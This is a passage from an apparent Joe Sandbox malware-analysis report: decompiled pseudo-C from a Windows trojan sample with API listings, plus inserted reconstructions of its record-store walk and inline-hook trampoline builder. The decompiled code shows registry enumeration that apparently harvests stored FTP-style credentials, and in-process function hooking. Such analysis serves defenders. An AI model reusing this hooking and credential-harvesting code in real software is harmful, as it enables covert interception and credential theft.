            						E0040F369(_t78,  &_v100);
            						E0040D929(_t127, _v28, 0x311, _t147, _t127);
            					}
            					return E00410418(_v28);
            				}
            				_v20 = 0;
            				_v12 = 0x104;
            				if(RegEnumKeyExW(_v8, 0,  &_v724,  &_v12, 0, 0, 0, 0) != 0) {
            					L19:
            					RegCloseKey(_v8);
            					goto L20;
            				} else {
            					do {
            						_v20 = _v20 + 1;
            						_t89 = E004143B6(_v8, 0xff, _t113, _v16,  &_v724,  &_v72);
            						_v12 = _t89;
            						if(_t89 != 0xffffffff && _t89 > 0) {
            							_t97 = E004143B6(_v8, 0xff, _t113, _v32,  &_v724,  &_v60);
            							_v12 = _t97;
            							if(_t97 != 0xffffffff && _t97 > 0) {
            								_t119 = _v36;
            								_t101 = E004143B6(_v8, 0xff, _t113, _t119,  &_v724,  &_v48);
            								_v12 = _t101;
            								if(_t101 != 0xffffffff && _t101 > 0) {
            									_t113 = _t119;
            									if(E00411098(_t119) > 0) {
            										_t120 = E0041442C(_v8, _t113,  &_v724,  &_v84);
            										if(_t120 < 1 || _t120 > 0xffff) {
            											_t120 = 0x15;
            										}
            										_t128 =  &_v140;
            										_t107 = 0x2c;
            										E0040F369(_t107,  &_v140);
            										_push(_t120);
            										_push(_v16);
            										_t121 = _v40;
            										_push(_v36);
            										_push(_v32);
            										_t110 = E004111A5(_t128, 0x311, _v40, _t128);
            										_t129 = _t129 + 0x14;
            										if(_t110 > 0) {
            											_t113 =  &_v28;
            											if(E00410818(_t110,  &_v28, _t121) != 0) {
            												_v24 = _v24 + 1;
            											}
            										}
            									}
            								}
            							}
            						}
            						_v12 = 0x104;
            					} while (RegEnumKeyExW(_v8, _v20,  &_v724,  &_v12, 0, 0, 0, 0) == 0);
            					_t116 = 0;
            					goto L19;
            				}
            			}
            Instruction addresses for the C-Code above: 0x004094e0 to 0x00409709.

            APIs
            • HeapAlloc.KERNEL32(00000008,00000C20,?,00000000,00000008,?,?,00000001), ref: 00409507
            • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,?,00000001), ref: 0040957D
            • RegEnumKeyExW.ADVAPI32 ref: 004095A8
            • RegCloseKey.ADVAPI32(?,?,?,00000001), ref: 004096D4
              • Part of subcall function 004143B6: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000001,00000000,?,?,0040F571,?,00000017,.exe,00000000,00000000), ref: 004143C9
            • RegEnumKeyExW.ADVAPI32 ref: 004096C1
              • Part of subcall function 0041442C: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,0040BFB8,?,?), ref: 00414444
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Open$Enum$AllocCloseHeap
            • String ID:
            • API String ID: 3287537325-0
            • Opcode ID: 7f53d273c2ae39471f4597f2bb1220923d8686482de57e751d13e8ab85c86284
            • Instruction ID: 6af2541e65c2cf487d30ed341f0b89546ed1ed67914672326d2ba30f4f1cae26
            • Opcode Fuzzy Hash: 7f53d273c2ae39471f4597f2bb1220923d8686482de57e751d13e8ab85c86284
            • Instruction Fuzzy Hash: BC517A72D00109AADB20EBA5CD45FEEBBB8EB44310F10457AFA04F3291D7799E858B94
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 96%
            			// Opens the file named by _a4 read/write (OPEN_ALWAYS, FILE_SHARE_READ) into *__esi and
            			// walks it as a chain of records: each record starts with a 5-byte header whose first
            			// dword, XORed with the key at __esi[4], is the payload length; the fifth byte is not
            			// inspected. The walk stops at a short header, at a record whose end exceeds the 64-bit
            			// size from E0041586F (GetFileSizeEx), or at a length above 0xa00000; the file is then
            			// cut at that record with E0041581F (seek) + SetEndOfFile. On success __esi[2] and
            			// __esi[3] are set to -1, the position is reset to 0 and 1 is returned; on any API
            			// failure the handle is closed, *__esi becomes -1 and 0 is returned.
            			E00416338(void* __ecx, signed int __edx, void** __esi, long _a4) {
            				char _v5;
            				void _v16;
            				struct _OVERLAPPED* _v24;
            				struct _OVERLAPPED* _v28;
            				signed int _v32;
            				signed int _v36;
            				void* _t29;
            				signed int _t31;
            				int _t38;
            				int _t39;
            				signed int _t41;
            				int _t42;
            				int _t45;
            				intOrPtr _t48;
            				void* _t49;
            				signed int _t53;
            				struct _OVERLAPPED* _t54;
            				void** _t56;
            
            				_t56 = __esi;
            				_t53 = __edx;
            				_t49 = __ecx;
            				_t54 = 0;
            				_v5 = 0;
            				_t29 = CreateFileW(_a4, 0xc0000000, 1, 0, 4, 0x80, 0);
            				 *__esi = _t29;
            				if(_t29 != 0xffffffff) {
            					_t31 = E0041586F(_t49, _t29);
            					_v36 = _t31;
            					_v32 = _t53;
            					if((_t31 & _t53) == 0xffffffff) {
            						L4:
            						CloseHandle( *_t56);
            						 *_t56 =  *_t56 | 0xffffffff;
            					} else {
            						if((_t31 | _t53) == 0) {
            							L18:
            							_t56[2] = _t56[2] | 0xffffffff;
            							_t25 =  &(_t56[3]);
            							 *_t25 = _t56[3] | 0xffffffff;
            							__eflags =  *_t25;
            							_v5 = 1;
            							E0041581F( *_t56, _t54, _t54, _t54);
            						} else {
            							_v28 = 0;
            							_v24 = 0;
            							if(ReadFile( *__esi,  &_v16, 5,  &_a4, 0) != 0) {
            								while(1) {
            									__eflags = _a4 - _t54;
            									if(_a4 == _t54) {
            										goto L18;
            									}
            									__eflags = _a4 - 5;
            									if(_a4 != 5) {
            										L16:
            										_t38 = E0041581F( *_t56, _v28, _v24, _t54);
            										__eflags = _t38;
            										if(_t38 == 0) {
            											goto L4;
            										} else {
            											_t39 = SetEndOfFile( *_t56);
            											__eflags = _t39;
            											if(_t39 == 0) {
            												goto L4;
            											} else {
            												goto L18;
            											}
            										}
            									} else {
            										_t41 = _v16 ^ _t56[4];
            										asm("adc edi, [ebp-0x14]");
            										_t48 = _t41 + _v28 + 5;
            										asm("adc edi, ecx");
            										_v16 = _t41;
            										__eflags = 0 - _v32;
            										if(__eflags > 0) {
            											L15:
            											_t54 = 0;
            											__eflags = 0;
            											goto L16;
            										} else {
            											if(__eflags < 0) {
            												L11:
            												__eflags = _t41 - 0xa00000;
            												if(_t41 > 0xa00000) {
            													goto L15;
            												} else {
            													_t42 = E0041581F( *_t56, _t41, 0, 1);
            													__eflags = _t42;
            													if(_t42 == 0) {
            														goto L4;
            													} else {
            														_v28 = _t48;
            														_v24 = 0;
            														_t45 = ReadFile( *_t56,  &_v16, 5,  &_a4, 0);
            														__eflags = _t45;
            														if(_t45 != 0) {
            															_t54 = 0;
            															__eflags = 0;
            															continue;
            														} else {
            															goto L4;
            														}
            													}
            												}
            											} else {
            												__eflags = _t48 - _v36;
            												if(_t48 > _v36) {
            													goto L15;
            												} else {
            													goto L11;
            												}
            											}
            										}
            									}
            									goto L19;
            								}
            								goto L18;
            							} else {
            								goto L4;
            							}
            						}
            					}
            				}
            				L19:
            				return _v5;
            			}
            Instruction addresses for the C-Code above: 0x00416338 to 0x00416465.

            APIs
            • CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000004,00000080,00000000,00000000,00000000), ref: 00416359
              • Part of subcall function 0041586F: GetFileSizeEx.KERNEL32(pcA,pcA,?,?,?,00416370,00000000), ref: 0041587B
            • ReadFile.KERNEL32(?,?,00000005,00000000,00000000,00000000), ref: 0041639A
            • CloseHandle.KERNEL32(?,00000000), ref: 004163A6
            • ReadFile.KERNEL32(?,?,00000005,00000005,00000000,?,?,00000000,00000001), ref: 00416415
            • SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 0041643B
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: File$Read$CloseCreateHandleSize
            • String ID:
            • API String ID: 1850650832-0
            • Opcode ID: b71dba6a67df98233a78326632f389910b90784b07bd2d54eb997625e6b18ba2
            • Instruction ID: 864394138077e883aa55fef53730b6229bcd19b39a27a9c94eda86169fad357c
            • Opcode Fuzzy Hash: b71dba6a67df98233a78326632f389910b90784b07bd2d54eb997625e6b18ba2
            • Instruction Fuzzy Hash: AA41A534900208AEDF209F55CC85BEFBFB9EF84314F15411EFAA5E22A0D7398581DB69
            Uniqueness

            Uniqueness Score: -1.00%
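The record chain that E00416338 validates can be walked offline once a copy of the file is recovered. The following is an added example, not the sample's code or Joe Sandbox output; it assumes only what the decompiled lines show (a 5-byte header whose first dword XOR the key at __esi[4] is the payload length, the 0xa00000 cap, truncation at the first inconsistent record) and works on an in-memory buffer instead of a file handle. The key value, the record contents and the helper names are constructed for illustration.

```c
/* Added example, not code from the sample or from Joe Sandbox. Re-implements, over
 * an in-memory buffer, the consistency walk E00416338 performs on a file: records
 * are a 5-byte header (32-bit length in the host's native byte order, XORed with a
 * per-store key, then one byte the walk ignores) followed by `length` payload
 * bytes. Key and records below are constructed. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define HDR_LEN      5
#define MAX_REC_LEN  0xA00000u     /* E00416338 rejects lengths above 10 MiB */
#define DEMO_KEY     0x5A5A5A5Au   /* constructed stand-in for the key at __esi[4] */

/* Offset at which E00416338 would call SetEndOfFile: the start of the first record
 * whose header is short, whose payload runs past `size`, or whose length exceeds
 * MAX_REC_LEN. Returns `size` when the chain ends exactly at EOF (an empty store
 * counts as valid). Only headers are read, never payloads. */
static uint64_t truncate_point(const uint8_t *buf, uint64_t size, uint32_t key)
{
    uint64_t pos = 0;
    while (pos < size) {
        if (size - pos < HDR_LEN)          /* ReadFile returned fewer than 5 bytes */
            return pos;
        uint32_t raw;
        memcpy(&raw, buf + pos, sizeof raw);
        uint32_t len = raw ^ key;
        uint64_t next = pos + HDR_LEN + len;
        if (next > size || len > MAX_REC_LEN)
            return pos;
        pos = next;                        /* seek forward by `len` from the header end */
    }
    return size;                           /* ReadFile returned 0 bytes: clean end */
}

/* Appends one record with an obfuscated header; returns the new write position.
 * `len` is the declared length, `avail` how many payload bytes are actually written. */
static size_t put_record(uint8_t *buf, size_t pos, uint32_t len, size_t avail,
                         uint8_t tag, uint32_t key)
{
    uint32_t raw = len ^ key;
    memcpy(buf + pos, &raw, sizeof raw);
    buf[pos + 4] = tag;
    memset(buf + pos + HDR_LEN, 'x', avail);
    return pos + HDR_LEN + avail;
}

/* Constructed store: two well-formed records followed by one whose declared
 * length (100) exceeds the 4 payload bytes present. Returns the store size (22);
 * truncate_point() reports 13 for it, the start of the bad record. */
static size_t demo_store(uint8_t *buf, size_t cap)
{
    if (cap < 22)
        return 0;
    size_t pos = 0;
    pos = put_record(buf, pos, 3, 3, 0x01, DEMO_KEY);     /* offsets 0..7  */
    pos = put_record(buf, pos, 0, 0, 0x02, DEMO_KEY);     /* offsets 8..12 */
    pos = put_record(buf, pos, 100, 4, 0x03, DEMO_KEY);   /* offset 13, short */
    return pos;
}

int main(void)
{
    uint8_t buf[64];
    size_t n = demo_store(buf, sizeof buf);
    printf("store size %zu, truncate at %llu\n", n,
           (unsigned long long)truncate_point(buf, n, DEMO_KEY));
    return 0;
}
```

Against a store pulled from an infected host the key is whatever the sample keeps at __esi[4]; with a wrong key the first decoded length is usually either past the file size or above the cap, so a truncation point of 0 on a non-empty file is a quick sign that the key is wrong rather than that the file is corrupt.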

            C-Code - Quality: 84%
            			// Installs an inline hook in the current process (pseudo-handle 0xffffffff). After
            			// E00414D05 (VirtualQueryEx) confirms at least 0x1e bytes at _a4 and the page is made
            			// PAGE_EXECUTE_READWRITE, it copies 0x1e bytes of the prologue and steps through whole
            			// instructions (lengths from E00416BD0) until 5 or more bytes are covered, adding
            			// (_a4 - _a8) to the rel32 of any copied 5-byte E8 call / E9 jmp, appends an E9 back to
            			// _a4 + stolen bytes, writes that trampoline to _a8, and finally overwrites the prologue
            			// at _a4 with an E9 to __eax. Returns the trampoline length (stolen bytes + 5) or 0.
            			E00414D4A(void* __eax, intOrPtr __ecx, void* __edx, void* __eflags, void* _a4, void* _a8) {
            				long _v8;
            				DWORD* _v12;
            				intOrPtr _v47;
            				void _v48;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* __ebp;
            				void* _t47;
            				void* _t57;
            				intOrPtr _t60;
            				void* _t61;
            				intOrPtr* _t63;
            				long _t65;
            				DWORD* _t66;
            				void* _t68;
            
            				_t61 = __edx;
            				_t60 = __ecx;
            				_t57 = __eax;
            				_t66 = 0;
            				_v12 = 0;
            				if(E00414D05(_a4) < 0x1e || VirtualProtectEx(0xffffffff, _a4, 0x1e, 0x40,  &_v8) == 0) {
            					L18:
            					return _v12;
            				} else {
            					E004104CB( &_v48,  &_v48, 0xffffff90, 0x23);
            					if(ReadProcessMemory(0xffffffff, _a4,  &_v48, 0x1e, 0) == 0) {
            						L17:
            						VirtualProtectEx(0xffffffff, _a4, 0x1e, _v8,  &_v8);
            						goto L18;
            					} else {
            						_t63 =  &_v48;
            						_push(0);
            						_push(_t63);
            						while(1) {
            							_t47 = E00416BD0(_t57, _t60, _t61, _t63, _t66);
            							if(_t47 == 0xffffffff) {
            								break;
            							}
            							_t66 = _t66 + _t47;
            							if(_t66 > 0x1e) {
            								L16:
            								goto L17;
            							}
            							_t60 =  *_t63;
            							if(_t60 == 0xe9 || _t60 == 0xe8) {
            								if(_t47 == 5) {
            									 *((intOrPtr*)(_t63 + 1)) =  *((intOrPtr*)(_t63 + 1)) + _a4 - _a8;
            								}
            							}
            							_push(0);
            							if(_t66 >= 5) {
            								_t17 = _t66 + 5; // 0x5
            								_t65 = _t17;
            								 *((intOrPtr*)(_t68 + _t66 - 0x2b)) = _a4 - _a8 - 5;
            								 *((char*)(_t68 + _t66 - 0x2c)) = 0xe9;
            								if(WriteProcessMemory(0xffffffff, _a8,  &_v48, _t65, ??) != 0) {
            									_v48 = 0xe9;
            									_v47 = _t57 - _a4 - 5;
            									if(WriteProcessMemory(0xffffffff, _a4,  &_v48, 5, 0) != 0) {
            										_v12 = _t65;
            									}
            								}
            								goto L16;
            							}
            							_t63 = _t68 + _t66 - 0x2c;
            							_push(_t63);
            						}
            						goto L16;
            					}
            				}
            			}
            Instruction addresses for the C-Code above: 0x00414d4a to 0x00414e5c.

            APIs
              • Part of subcall function 00414D05: VirtualQueryEx.KERNEL32(000000FF,?,?,0000001C,-00000008,?,?,?,?,00406230,00000000,00000000,00000012,00403A56), ref: 00414D1A
            • VirtualProtectEx.KERNEL32(000000FF,00000000,0000001E,00000040,00000000,-00000008,00000012,00000000,?,?,?,004064D9,0041A020,00000001,00403A56), ref: 00414D77
            • ReadProcessMemory.KERNEL32(000000FF,00000000,00000023,0000001E,00000000,00000023,00000090,00000023,?,?,?,004064D9,0041A020,00000001,00403A56), ref: 00414D9E
            • WriteProcessMemory.KERNEL32(000000FF,00000000,00000000,00000005,00000000,00000000,00000000), ref: 00414E18
            • WriteProcessMemory.KERNEL32(000000FF,00000000,000000E9,00000005,00000000), ref: 00414E38
            • VirtualProtectEx.KERNEL32(000000FF,00000000,0000001E,00000000,00000000,?,?,?,004064D9,0041A020,00000001,00403A56), ref: 00414E50
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: MemoryProcessVirtual$ProtectWrite$QueryRead
            • String ID:
            • API String ID: 390532180-0
            • Opcode ID: ac64923e744eb98b30f763b884ff3ed8716f7cb367a1f2d0c8383c91dd5100cd
            • Instruction ID: 80b260e5833558353360dcaed46993bda44392057d52ada0c07c212446e190be
            • Opcode Fuzzy Hash: ac64923e744eb98b30f763b884ff3ed8716f7cb367a1f2d0c8383c91dd5100cd
            • Instruction Fuzzy Hash: B7318132900218BADF10DEB8DC44EDE7BA8AB49770F148316FA25EA1D0C634D6808B68
            Uniqueness

            Uniqueness Score: -1.00%
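The bytes E00414D4A writes with WriteProcessMemory can be reproduced on a constructed prologue without touching any process. This is an added example, not the sample's code or Joe Sandbox output. It assumes a caller-supplied instruction-length table in place of the sample's length decoder E00416BD0 and made-up addresses (hooked function at 0x00401000, trampoline at 0x00500000, hook at 0x00410000); the rel32 fix-up by (_a4 - _a8) and the back-jump displacement _a4 - _a8 - 5 are taken from the decompiled lines.

```c
/* Added example, not code from the sample or from Joe Sandbox. Reproduces the
 * arithmetic of E00414D4A on a constructed prologue: instruction lengths come
 * from a caller-supplied table standing in for E00416BD0, addresses are made up. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define STOLEN_MAX 0x1e      /* bytes E00414D4A reads from the hooked prologue */
#define JMP_LEN    5         /* E9 rel32 */

static uint32_t rd32(const uint8_t *p) { uint32_t v; memcpy(&v, p, 4); return v; }
static void     wr32(uint8_t *p, uint32_t v) { memcpy(p, &v, 4); }

/* Builds the trampoline that will live at `tramp_addr` from the instructions at
 * `target_addr` (bytes in `orig`, lengths in `ins_len`), plus the 5-byte patch
 * that sends `target_addr` to `hook_addr`. Returns the trampoline length
 * (stolen bytes + 5), or 0 if 5 bytes cannot be covered within STOLEN_MAX. */
static size_t build_inline_hook(const uint8_t *orig, const uint8_t *ins_len, size_t n_ins,
                                uint32_t target_addr, uint32_t tramp_addr, uint32_t hook_addr,
                                uint8_t *tramp, uint8_t *patch)
{
    size_t stolen = 0;
    for (size_t i = 0; i < n_ins; i++) {
        size_t len = ins_len[i];
        if (stolen + len > STOLEN_MAX)
            return 0;
        memcpy(tramp + stolen, orig + stolen, len);
        /* A relocated E8 call / E9 jmp keeps its destination only if its rel32
         * grows by (original address - new address); the sample adds _a4 - _a8. */
        uint8_t op = tramp[stolen];
        if ((op == 0xE8 || op == 0xE9) && len == 5)
            wr32(tramp + stolen + 1, rd32(tramp + stolen + 1) + (target_addr - tramp_addr));
        stolen += len;
        if (stolen >= JMP_LEN) {
            /* jmp from tramp_addr+stolen back to target_addr+stolen */
            tramp[stolen] = 0xE9;
            wr32(tramp + stolen + 1, target_addr - tramp_addr - JMP_LEN);
            /* jmp from target_addr to the hook: this is what lands in the prologue */
            patch[0] = 0xE9;
            wr32(patch + 1, hook_addr - target_addr - JMP_LEN);
            return stolen + JMP_LEN;
        }
    }
    return 0;
}

/* Constructed prologue at 0x00401000: push ebp / mov ebp,esp / call 0x00401100.
 * Trampoline at 0x00500000, hook at 0x00410000. Fills `tramp` (13 bytes) and
 * `patch` (5 bytes) and returns 13. */
static size_t demo_hook(uint8_t *tramp, uint8_t *patch)
{
    static const uint8_t orig[]    = { 0x55, 0x8B, 0xEC, 0xE8, 0xF8, 0x00, 0x00, 0x00 };
    static const uint8_t ins_len[] = { 1, 2, 5 };
    return build_inline_hook(orig, ins_len, sizeof ins_len,
                             0x00401000u, 0x00500000u, 0x00410000u, tramp, patch);
}

int main(void)
{
    uint8_t tramp[STOLEN_MAX + JMP_LEN], patch[JMP_LEN];
    size_t n = demo_hook(tramp, patch);
    printf("trampoline (%zu bytes):", n);
    for (size_t i = 0; i < n; i++) printf(" %02X", tramp[i]);
    printf("\nprologue patch:");
    for (size_t i = 0; i < JMP_LEN; i++) printf(" %02X", patch[i]);
    printf("\n");
    return 0;
}
```

For a hunter the useful artifact is the patch: a function whose first byte in memory is E9 while the on-disk image starts with something else (here 55 8B EC) is the signature of this routine having run, and following the E9 leads to the hook rather than to the trampoline.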

            C-Code - Quality: 100%
            			// Creates (CREATE_ALWAYS, GENERIC_WRITE) the file whose path E00415D45 builds from __ecx
            			// and decrypted string 0xf, writes the 0x146-byte block produced by E0040F333(0x14) and,
            			// when __edx is non-null, the buffer at __edx with the length E00411086 reports. If either
            			// write fails or is short, E004158D7 is called on the path, presumably to remove the
            			// incomplete file. Always returns 1.
            			E0040A5CD(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
            				void* _v8;
            				long _v12;
            				void* _v16;
            				char _v32;
            				void _v360;
            				short _v880;
            				void* __edi;
            				void* __esi;
            				void* _t18;
            				void* _t25;
            				void* _t26;
            				long _t39;
            				void* _t42;
            				void* _t44;
            				long _t47;
            
            				_t48 =  &_v32;
            				_t18 = 0xf;
            				_v16 = __edx;
            				_t44 = __ecx;
            				E0040F369(_t18,  &_v32);
            				if(E00415D45(_t48,  &_v880, _t44) == 0) {
            					L11:
            					return 1;
            				}
            				_t25 = CreateFileW( &_v880, 0x40000000, 1, 0, 2, 0x80, 0);
            				_v8 = _t25;
            				if(_t25 == 0xffffffff) {
            					goto L11;
            				}
            				_t26 = 0x14;
            				_t39 = 0;
            				E0040F333(_t26,  &_v360);
            				if(WriteFile(_v8,  &_v360, 0x146,  &_v12, 0) == 0 || _v12 != 0x146) {
            					L9:
            					FlushFileBuffers(_v8);
            					CloseHandle(_v8);
            					if(_t39 == 0) {
            						E004158D7( &_v880);
            					}
            					goto L11;
            				} else {
            					_t42 = _v16;
            					if(_t42 == 0) {
            						L7:
            						_t39 = 1;
            						goto L9;
            					}
            					_t47 = E00411086(_t42);
            					if(WriteFile(_v8, _t42, _t47,  &_v12, 0) == 0 || _v12 != _t47) {
            						_t39 = 0;
            						goto L9;
            					} else {
            						goto L7;
            					}
            				}
            			}
            Instruction addresses for the C-Code above: 0x0040a5da to 0x0040a6b3.

            APIs
              • Part of subcall function 00415D45: PathCombineW.SHLWAPI(?,?,004014A8,004038F5,?,?,?,00000000), ref: 00415D65
            • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?,?,00000000), ref: 0040A618
            • WriteFile.KERNEL32(0040A5B5,?,00000146,?,00000000,00000000), ref: 0040A656
            • WriteFile.KERNEL32(0040A5B5,?,00000000,?,00000000), ref: 0040A67A
            • FlushFileBuffers.KERNEL32(0040A5B5), ref: 0040A68E
            • CloseHandle.KERNEL32(0040A5B5), ref: 0040A697
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: File$Write$BuffersCloseCombineCreateFlushHandlePath
            • String ID:
            • API String ID: 2459967240-0
            • Opcode ID: 87c6b3d0f8b068524891429315e5fa5b6c38a3f65c7d543555488c267bcffd37
            • Instruction ID: 33e7084092379ecc7a200681c1635959d9c1ad929ce949161d3a3e6c324dfc83
            • Opcode Fuzzy Hash: 87c6b3d0f8b068524891429315e5fa5b6c38a3f65c7d543555488c267bcffd37
            • Instruction Fuzzy Hash: E721DC32940218BACF209BA1CD45FEF7BBCAF44350F144577A980F3190DB3A8A55CB66
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			// Worker thread. If E00403D00(0x19367401, 1) fails it returns 1; otherwise it derives a
            			// name from 0xff220823 via E00403CC5, builds a path with E00403ED1 and PathQuoteSpacesW,
            			// and, while WaitForSingleObject on the event at 0x41a758 keeps timing out (0x102) every
            			// 200 ms, calls E004144D2(string 0xa4, name, 1, path, (len * 2) + 2). The argument shape
            			// (type 1 with a byte count covering the wide string and its terminator) is consistent
            			// with a REG_SZ value being rewritten each round. Exits through E00413A4E(_v12) with 0.
            			E00404811(void* __ecx, void* __eflags) {
            				intOrPtr _v8;
            				intOrPtr _v12;
            				char _v104;
            				char _v204;
            				char _v724;
            				void* __edi;
            				void* __esi;
            				intOrPtr _t18;
            				void* _t24;
            				long _t28;
            				long _t35;
            				void* _t40;
            				WCHAR* _t43;
            				void* _t50;
            
            				_t50 = __eflags;
            				_t40 = __ecx;
            				SetThreadPriority(GetCurrentThread(), 0);
            				_t18 = E00403D00(_t40, _t50, 0x19367401, 1);
            				_v12 = _t18;
            				if(_t18 != 0) {
            					E00403CC5(0xff220823,  &_v204, 0);
            					_t43 =  &_v724;
            					E00403ED1(_t40, _t43, 1);
            					PathQuoteSpacesW(_t43);
            					_t41 = _t43;
            					_v8 = E00411098(_t43);
            					_t24 = E00403E39();
            					__eflags = _t24;
            					if(_t24 == 0) {
            						L7:
            						E00413A4E(_v12);
            						__eflags = 0;
            						return 0;
            					}
            					E0040F369(0xa4,  &_v104);
            					_t28 = WaitForSingleObject( *0x41a758, 0xc8);
            					__eflags = _t28 - 0x102;
            					if(_t28 != 0x102) {
            						L6:
            						goto L7;
            					}
            					_v8 = _v8 + _v8 + 2;
            					do {
            						E004144D2(_t41,  &_v104,  &_v204, 1,  &_v724, _v8);
            						_t35 = WaitForSingleObject( *0x41a758, 0xc8);
            						__eflags = _t35 - 0x102;
            					} while (_t35 == 0x102);
            					goto L6;
            				}
            				return _t18 + 1;
            			}

            APIs
            • GetCurrentThread.KERNEL32 ref: 0040481C
            • SetThreadPriority.KERNEL32(00000000), ref: 00404823
              • Part of subcall function 00403D00: CreateMutexW.KERNEL32(0041A2C8,00000000,?,?,?,?,?), ref: 00403D21
            • PathQuoteSpacesW.SHLWAPI(?,00000001,FF220823,?,00000000,?,19367401,00000001), ref: 00404866
            • WaitForSingleObject.KERNEL32(000000C8,?,?,?,19367401,00000001), ref: 004048A0
            • WaitForSingleObject.KERNEL32(000000C8,?,?,00000001,?,?,?,?,?,19367401,00000001), ref: 004048D6
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: ObjectSingleThreadWait$CreateCurrentMutexPathPriorityQuoteSpaces
            • String ID:
            • API String ID: 123286213-0
            • Opcode ID: cd85183662a0335e7b9dcb6e1f5c4870e11d88af898ec28910f3ba5ff69ffd86
            • Instruction ID: 69c85ff8c01682c76bd3770529f4c55df87910b7ab93001c803deedc4962b8b8
            • Opcode Fuzzy Hash: cd85183662a0335e7b9dcb6e1f5c4870e11d88af898ec28910f3ba5ff69ffd86
            • Instruction Fuzzy Hash: 4D21C272900208AEEB00ABA0DD45FEE7BACEB44304F104476F600F71A1D6749F418B98
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • socket.WS2_32(?,00000002,00000000), ref: 004137B5
            • WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00020000,00000000,00020000,00000000,00000000), ref: 004137DF
            • WSAGetLastError.WS2_32 ref: 004137E6
              • Part of subcall function 004103ED: HeapAlloc.KERNEL32(00000008,-00000004,00411BB4,00000000,?,?,?,?,0040373A,00000000,00403AF4,?,00000000), ref: 004103F9
            • WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00413818
              • Part of subcall function 00410418: HeapFree.KERNEL32(00000000,00000000,00411C0D,00000000,?,?,?,?,0040373A,00000000,00403AF4), ref: 0041042B
            • closesocket.WS2_32(?), ref: 0041382C
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: HeapIoctl$AllocErrorFreeLastclosesocketsocket
            • String ID:
            • API String ID: 3987134166-0
            • Opcode ID: 33823560d36c58e50ee98f791afc713ae9c656990d0fb403b54b390940bbac45
            • Instruction ID: 892aa742d0e1123e955588173a65afe0ba912d105ff12f8762b9abc2eed0dad7
            • Opcode Fuzzy Hash: 33823560d36c58e50ee98f791afc713ae9c656990d0fb403b54b390940bbac45
            • Instruction Fuzzy Hash: 9B111675801128BADB10AFA5DD48CDFBFACEF053A4B204126F905A21A0D2349F90DAE4
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 89%
            			E00407E64(void* __ecx, char* __edx, void* __eflags) {
            				intOrPtr _v8;
            				char _v12;
            				char _v16;
            				intOrPtr _v24;
            				intOrPtr _v28;
            				intOrPtr _v32;
            				char _v36;
            				char _v60;
            				char _v84;
            				char _v124;
            				short _v644;
            				short _v1164;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* _t29;
            				void* _t31;
            				void* _t36;
            				void* _t38;
            				void* _t42;
            				WCHAR* _t45;
            				void* _t55;
            				char* _t64;
            				signed int _t65;
            				void* _t66;
            				intOrPtr _t74;
            
            				_t58 = __edx;
            				_t55 = __ecx;
            				E004104CB( &_v12,  &_v12, 0, 8);
            				_t29 = 0x37;
            				E0040F369(_t29,  &_v124);
            				_t31 = 0x38;
            				E0040F369(_t31,  &_v60);
            				_t36 = E004143B6(0x80000002, 0x104, _t55,  &_v644,  &_v124,  &_v60);
            				if(_t36 != 0xffffffff) {
            					_t69 = _t36;
            					if(_t36 > 0) {
            						ExpandEnvironmentStringsW( &_v644,  &_v1164, 0x104);
            						E00407C02(_t69,  &_v1164,  &_v12);
            					}
            				}
            				if(_v8 != 0) {
            					L9:
